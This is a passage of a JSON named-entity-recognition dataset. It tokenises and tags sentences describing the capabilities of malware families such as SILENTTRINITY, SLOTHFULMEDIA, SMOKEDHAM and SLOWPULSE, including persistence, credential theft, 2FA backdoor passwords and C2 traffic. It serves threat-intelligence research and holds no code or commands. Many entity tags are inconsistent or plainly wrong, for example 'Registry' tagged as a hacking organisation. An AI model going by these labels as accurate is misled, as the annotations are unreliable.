"enumerate", - "shares", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "PowerShell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "enumerate", - "processes,", - "including", - "properties", - "to", - "determine", - "if", - "they", - "have", - "the", - "Common", - "Language", - "Runtime", - "(CLR)", - "loaded." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "inject", - "shellcode", - "directly", - "into", - "Excel.exe", - "or", - "a", - "specific", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "is", - "written", - "in", - "Python", - "and", - "can", - "use", - "multiple", - "Python", - "scripts", - "for", - "execution", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "the", - "`GetRegValue`", - "function", - "to", - "check", - "Registry", - "keys", - "within", - "`HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`", - "and", - "`HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`.", - "It", - "also", - "contains", - "additional", - "modules", - "that", - "can", - "check", - "software", - "AutoRun", - "values", - "and", - "use", - "the", - "Win32", - "namespace", - "to", - "get", - "values", - "from", - "HKCU,", - "HKLM,", - "HKCR,", - "and", - "HKCC", - "hives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "establish", - "a", - "LNK", - "file", - "in", - "the", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "enumerate", - "and", - "collect", - "the", - "properties", - "of", - "domain", - "computers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "take", - "a", - "screenshot", - "of", - "the", - "current", - "desktop." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "determine", - "if", - "an", - "anti-virus", - "product", - "is", - "installed", - "through", - "the", - "resolution", - "of", - "the", - "service's", - "virtual", - "SID." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "collect", - "information", - "related", - "to", - "a", - "compromised", - "host,", - "including", - "OS", - "version", - "and", - "a", - "list", - "of", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "gather", - "a", - "list", - "of", - "logged", - "on", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "search", - "for", - "modifiable", - "services", - "that", - "could", - "be", - "used", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "collect", - "start", - "time", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "find", - "a", - "process", - "owned", - "by", - "a", - "specific", - "user", - "and", - "impersonate", - "the", - "associated", - "token." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "`cmd.exe`", - "to", - "enable", - "lateral", - "movement", - "using", - "DCOM." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "gather", - "Windows", - "Vault", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "WMI", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "create", - "a", - "WMI", - "Event", - "to", - "execute", - "a", - "payload", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "tracks", - "`TrustedHosts`", - "and", - "can", - "move", - "laterally", - "to", - "these", - "targets", - "via", - "WinRM." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "establish", - "persistence", - "by", - "creating", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "contains", - "functionality", - "to", - "execute", - "arbitrary", - "commands", - "passed", - "to", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "can", - "read", - "files", - "specified", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "can", - "deobfuscate", - "base64", - "encoded", - "and", - "RC4", - "encrypted", - "C2", - "messages." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAPIDPULSE", - "can", - "transfer", - "files", - "to", - "and", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "has", - "piped", - "the", - "output", - "from", - "executed", - "commands", - "to", - "`/tmp/1`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "can", - "base64", - "encode", - "all", - "incoming", - "and", - "outgoing", - "C2", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "can", - "RC4", - "encrypt", - "all", - "incoming", - "and", - "outgoing", - "C2", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "has", - "the", - "ability", - "to", - "process", - "HTTP", - "GET", - "requests", - "as", - "a", - "normal", - "web", - "server", - "and", - "to", - "insert", - "logic", - "that", - "will", - "read", - "or", - "write", - "files", - "or", - "execute", - "commands", - "in", - "response", - "to", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLIGHTPULSE", - "is", - "a", - "web", - "shell", - "that", - "can", - "read,", - "write,", - "and", - "execute", - "files", - "on", - "compromised", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "hashed", - "a", - "string", - "containing", - "system", - "information", - "prior", - "to", - "exfiltration", - "via", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "uploaded", - "files", - "and", - "information", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "sent", - "system", - "information", - "to", - "a", - "C2", - "server", - "via", - "HTTP", - "and", - "HTTPS", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "deleted", - "itself", - "and", - "the", - "'index.dat'", - "file", - "on", - "a", - "compromised", - "machine", - "to", - "remove", - "recent", - "Internet", - "history", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "can", - "enumerate", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "been", - "created", - "with", - "a", - "hidden", - "attribute", - "to", - "insure", - "it's", - "not", - "visible", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "downloaded", - "files", - "onto", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "a", - "keylogging", - "capability." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "named", - "a", - "service", - "it", - "establishes", - "on", - "victim", - "machines", - "as", - "\"TaskFrame\"", - "to", - "hide", - "its", - "malicious", - "purpose." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "mimicked", - "the", - "names", - "of", - "known", - "executables,", - "such", - "as", - "mediaplayer.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "can", - "add,", - "modify,", - "and/or", - "delete", - "registry", - "keys.", - "It", - "has", - "changed", - "the", - "proxy", - "configuration", - "of", - "a", - "victim", - "system", - "by", - "modifying", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", - "Settings\\ZoneMap</code>", - "registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "enumerated", - "processes", - "by", - "ID,", - "name,", - "or", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "can", - "inject", - "into", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "taken", - "a", - "screenshot", - "of", - "a", - "victim's", - "desktop,", - "named", - "it", - "\"Filter3.jpg\",", - "and", - "stored", - "it", - "in", - "the", - "local", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "the", - "capability", - "to", - "start", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "the", - "capability", - "to", - "stop", - "processes", - "and", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "collected", - "system", - "name,", - "OS", - "version,", - "adapter", - "information,", - "memory", - "usage,", - "and", - "disk", - "information", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "can", - "enumerate", - "open", - "ports", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "collected", - "the", - "username", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "the", - "capability", - "to", - "enumerate", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "can", - "open", - "a", - "command", - "line", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOTHFULMEDIA", - "has", - "created", - "a", - "service", - "on", - "victim", - "machines", - "named", - "\"TaskFrame\"", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWDRIFT", - "uses", - "cloud", - "based", - "services", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWDRIFT", - "downloads", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SLOWDRIFT", - "collects", - "and", - "sends", - "system", - "information", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "is", - "applied", - "in", - "compromised", - "environments", - "through", - "modifications", - "to", - "legitimate", - "Pulse", - "Secure", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "can", - "write", - "logged", - "ACE", - "credentials", - "to", - "`/home/perl/PAUS.pm`", - "in", - "append", - "mode,", - "using", - "the", - "format", - "string", - "`%s:%s\\n`." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "can", - "insert", - "malicious", - "logic", - "to", - "bypass", - "RADIUS", - "and", - "ACE", - "two", - "factor", - "authentication", - "(2FA)", - "flows", - "if", - "a", - "designated", - "attacker-supplied", - "password", - "is", - "provided." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "can", - "log", - "credentials", - "on", - "compromised", - "Pulse", - "Secure", - "VPNs", - "during", - "the", - "`DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA", - "authentication", - "procedure." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "can", - "modify", - "LDAP", - "and", - "two", - "factor", - "authentication", - "flows", - "by", - "inspecting", - "login", - "credentials", - "and", - "forcing", - "successful", - "authentication", - "if", - "the", - "provided", - "password", - "matches", - "a", - "chosen", - "backdoor", - "password." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SLOWPULSE", - "can", - "hide", - "malicious", - "code", - "in", - "the", - "padding", - "regions", - "between", - "legitimate", - "functions", - "in", - "the", - "Pulse", - "Secure", - "`libdsplibs.so`", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "added", - "user", - "accounts", - "to", - "local", - "Admin", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "a", - "fronted", - "domain", - "to", - "obfuscate", - "its", - "hard-coded", - "C2", - "server", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "SMOKEDHAM", - "source", - "code", - "is", - "embedded", - "in", - "the", - "dropper", - "as", - "an", - "encrypted", - "string." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "exfiltrated", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "modified", - "the", - "Registry", - "to", - "hide", - "created", - "user", - "accounts", - "from", - "the", - "Windows", - "logon", - "screen." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "Powershell", - "to", - "download", - "UltraVNC", - "and", - "ngrok", - "from", - "third-party", - "file", - "sharing", - "sites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "can", - "continuously", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "<code>net.exe", - "user</code>", - "and", - "<code>net.exe", - "users</code>", - "to", - "enumerate", - "local", - "accounts", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "created", - "user", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "B-Purp", - "B-Tool" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "link", - "delivered", - "through", - "phishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "modified", - "registry", - "keys", - "for", - "persistence,", - "to", - "enable", - "credential", - "caching", - "for", - "credential", - "access,", - "and", - "to", - "facilitate", - "lateral", - "movement", - "via", - "RDP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "can", - "execute", - "Powershell", - "commands", - "sent", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "<code>reg.exe</code>", - "to", - "create", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "desktop." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "been", - "delivered", - "via", - "malicious", - "links", - "in", - "phishing", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "encoded", - "its", - "C2", - "traffic", - "with", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "encrypted", - "its", - "C2", - "traffic", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "the", - "<code>systeminfo</code>", - "command", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "<code>whoami</code>", - "commands", - "to", - "identify", - "system", - "owners." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "communicated", - "with", - "its", - "C2", - "servers", - "via", - "HTTPS", - "and", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMOKEDHAM", - "has", - "used", - "Google", - "Drive", - "and", - "Dropbox", - "to", - "host", - "files", - "downloaded", - "by", - "victims", - "via", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SNUGRIDE", - "establishes", - "persistence", - "through", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SNUGRIDE", - "encrypts", - "C2", - "traffic", - "using", - "AES", - "with", - "a", - "static", - "key." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SNUGRIDE", - "communicates", - "with", - "its", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SNUGRIDE", - "is", - "capable", - "of", - "executing", - "commands", - "and", - "spawning", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SOUNDBITE", - "is", - "capable", - "of", - "enumerating", - "application", - "windows." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SOUNDBITE", - "communicates", - "via", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SOUNDBITE", - "is", - "capable", - "of", - "enumerating", - "and", - "manipulating", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SOUNDBITE", - "is", - "capable", - "of", - "modifying", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SOUNDBITE", - "is", - "capable", - "of", - "gathering", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Data", - "SPACESHIP", - "copies", - "to", - "the", - "staging", - "area", - "is", - "compressed", - "with", - "zlib.", - "Bytes", - "are", - "rotated", - "by", - "four", - "positions", - "and", - "XOR'ed", - "with", - "0x23." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SPACESHIP", - "copies", - "staged", - "data", - "to", - "removable", - "drives", - "when", - "they", - "are", - "inserted", - "into", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SPACESHIP", - "identifies", - "files", - "and", - "directories", - "for", - "collection", - "by", - "searching", - "for", - "specific", - "file", - "extensions", - "or", - "file", - "modification", - "time." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SPACESHIP", - "identifies", - "files", - "with", - "certain", - "extensions", - "and", - "copies", - "them", - "to", - "a", - "directory", - "in", - "the", - "user's", - "profile." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SPACESHIP", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "in", - "the", - "current", - "user's", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - 